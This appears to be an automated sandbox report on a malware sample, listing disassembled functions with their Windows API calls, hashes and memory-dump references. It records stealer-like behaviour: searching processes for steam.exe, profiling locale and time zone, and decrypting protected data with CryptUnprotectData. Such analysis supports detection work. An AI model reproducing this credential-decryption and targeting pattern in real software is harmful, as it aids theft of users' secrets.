                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: ea26dbdc534de05f311bbffd9f965fab98dd4afb39c9fb537f6a745116ea5cc4
                                • Instruction ID: 27e46961f8e37d512f170d6ad8a749bb1c2ba7cb7d13d6e8adfcfb7b127ad758
                                • Opcode Fuzzy Hash: ea26dbdc534de05f311bbffd9f965fab98dd4afb39c9fb537f6a745116ea5cc4
                                • Instruction Fuzzy Hash: 0001A271602124ABD720EB61AC49FEA77BDFF09350F0402DAED48D1140EF748D948BE1
                                Function 006B4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4B7F
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BA7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B4BFA
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 2891f02b69f24d22f7948feb2885a5926b7706af98573b4fb2d61f46241cdd67
                                • Instruction ID: 9f40c0fdcbdd382ef995c00b4063761c0f101be0886300a01e0be56885affa4f
                                • Opcode Fuzzy Hash: 2891f02b69f24d22f7948feb2885a5926b7706af98573b4fb2d61f46241cdd67
                                • Instruction Fuzzy Hash: 94316BB16611169BCB62FF29EC95EDE77B7BF41700F000269FA4997622EB30DC018B94
                                Function 006C2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006C2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006C2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006C2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006C2DEC
                                • LocalFree.KERNEL32(00000000), ref: 006C2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 2fb153ff2a95dabae8e76e123604df48e3f86a4bf916eb17232c0243a851aeb7
                                • Instruction ID: f5a26a74f2e8df297f3bbd37819f7082a1d2b6f54d248c76448fad1f18265a4c
                                • Opcode Fuzzy Hash: 2fb153ff2a95dabae8e76e123604df48e3f86a4bf916eb17232c0243a851aeb7
                                • Instruction Fuzzy Hash: BDB1F771901215CFDB15DF14C948BA9B7B2FB44324F29C1AED809AB3A2D7769D82CF84
                                Function 00A59285 Relevance: 10.3, Strings: 7, Instructions: 1590COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: H];$OTF/$QO6$W~{$y:/=$C-~$U<U
                                • API String ID: 0-400207225
                                • Opcode ID: c2037272d7db61f3f6a676bed8a3cd3aa5a51f7c20e9e6626aa0322356eefe04
                                • Instruction ID: 85890c9b2f1d938ad1805dd5bad652798365bbccdf4f8beae6d43ab2bb8bf490
                                • Opcode Fuzzy Hash: c2037272d7db61f3f6a676bed8a3cd3aa5a51f7c20e9e6626aa0322356eefe04
                                • Instruction Fuzzy Hash: CBB205F360C2009FE304AE2DEC8567ABBE9EF94720F16893DE6C5C7744EA3558058697
                                Function 00A55D8E Relevance: 10.3, Strings: 7, Instructions: 1548COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !imm$&pW~$5VH$\o3$a_7{$jVww$jVww
                                • API String ID: 0-1153863318
                                • Opcode ID: fefa620d9d5345f65c4dac43bc6a79e878ed98890181577410d450ff42155b06
                                • Instruction ID: d4d0183c0f8e5aa7440e7e3a4e77c743a1c9126786943c30d5a265f5a0a55491
                                • Opcode Fuzzy Hash: fefa620d9d5345f65c4dac43bc6a79e878ed98890181577410d450ff42155b06
                                • Instruction Fuzzy Hash: A5B2F7F390C200AFE704AE29EC8567AFBE5EF94720F16893DE6C5C3744E63598448697
                                Function 00A5421F Relevance: 9.2, Strings: 6, Instructions: 1654COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %"]u$%u>{$(=w$5Vs$fM_$8
                                • API String ID: 0-1977447844
                                • Opcode ID: 5b275f4e2deb3880aecb8e3abd9daf60beba40399cb1a606730020d7402087b4
                                • Instruction ID: 7b8a58d08f46d0c4d1e12ac0fc274fbf1db06b82bb29399f84e5173675905eed
                                • Opcode Fuzzy Hash: 5b275f4e2deb3880aecb8e3abd9daf60beba40399cb1a606730020d7402087b4
                                • Instruction Fuzzy Hash: 0CB217F3A082049FE304AE2DEC8577AF7E9EF94720F16453DEAC4C3744EA3599058696
                                Function 00A5FC95 Relevance: 9.2, Strings: 6, Instructions: 1652COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Ai6^$REo$aLw_$fXh>$v"K$Z=
                                • API String ID: 0-1719109772
                                • Opcode ID: 30d8ca99bb88d8c2b009a6f7e41fd3126a9dbd7887a61efd4ff978485bcb58a5
                                • Instruction ID: b96828f087aefd38845af6369897e95ce53495277f23a33e033bfb6196cea9f2
                                • Opcode Fuzzy Hash: 30d8ca99bb88d8c2b009a6f7e41fd3126a9dbd7887a61efd4ff978485bcb58a5
                                • Instruction Fuzzy Hash: 09B207F360C2049FE304AE2DEC8567AB7E9EFD4320F16893DE6C5C7744EA3598058696
                                Function 006C2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 006C2C58
                                • wsprintfA.USER32 ref: 006C2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 7968de79b0e166137ee79efccbec60dc0ec075f6d099c4acd8730d7e2f924b46
                                • Instruction ID: bd24e34e91e03e8b521b8e6ca7a6a6bfd3f78821fa772f6d91e8e0f660a79ef5
                                • Opcode Fuzzy Hash: 7968de79b0e166137ee79efccbec60dc0ec075f6d099c4acd8730d7e2f924b46
                                • Instruction Fuzzy Hash: B201A271A40614ABDB189F58DC4AFAABB6AEB84721F00436AF916DB7C0DB7419048AD1
                                Function 00A577B5 Relevance: 7.9, Strings: 5, Instructions: 1637COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8}|$>{pK$HiQ$X5n\${eoj
                                • API String ID: 0-2167095355
                                • Opcode ID: 66e35838ec03581fa2c6ef1107f603306540de394ab9bc28dcbcb178c196cfcb
                                • Instruction ID: a9c94b0a0115b0345bffed8bb70ddedc3db976aa18382e96050f655852be8d6b
                                • Opcode Fuzzy Hash: 66e35838ec03581fa2c6ef1107f603306540de394ab9bc28dcbcb178c196cfcb
                                • Instruction Fuzzy Hash: 3EB2FAF3A082049FD304AE2DEC8567AFBEAEFD4720F16853DE6C4C7744E93558058696
                                Function 00A631F6 Relevance: 7.8, Strings: 5, Instructions: 1583COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2d/l$7Wt$Fq3}$adno$l4[
                                • API String ID: 0-2989521349
                                • Opcode ID: 8a83acadfe9fa14de6da7d29d83d9170696b5a4e49a2c9f59a248f25ee5af7cb
                                • Instruction ID: 4d2f9739acfad4f87ed61a4a642441ad1a6919f3061501376d45c26c8719bc7c
                                • Opcode Fuzzy Hash: 8a83acadfe9fa14de6da7d29d83d9170696b5a4e49a2c9f59a248f25ee5af7cb
                                • Instruction Fuzzy Hash: E8B2F4F360C2049FE304AE29EC8577ABBE5EF94320F16493DEAC5C3744EA3598458697
                                Function 00A5E31F Relevance: 7.8, Strings: 5, Instructions: 1525COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !qN$(p|;$Air$XFu?$6M}
                                • API String ID: 0-3187002293
                                • Opcode ID: cc099820baf1afab2760ea372672f4bc9cbab209dc4071c628dfd26045e22345
                                • Instruction ID: 61b5ecf8c771e41804f5a8db4f3ed191634c59d80ff214dc04162a7ac7fceae6
                                • Opcode Fuzzy Hash: cc099820baf1afab2760ea372672f4bc9cbab209dc4071c628dfd26045e22345
                                • Instruction Fuzzy Hash: D8A217F360C2049FE7046E2DEC8567ABBE9EF94720F1A853DE6C4C3744EA3598058796
                                Function 006A7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006A775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006A778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006A77AD
                                • LocalFree.KERNEL32(?), ref: 006A77B7
                                Memory Dump Source
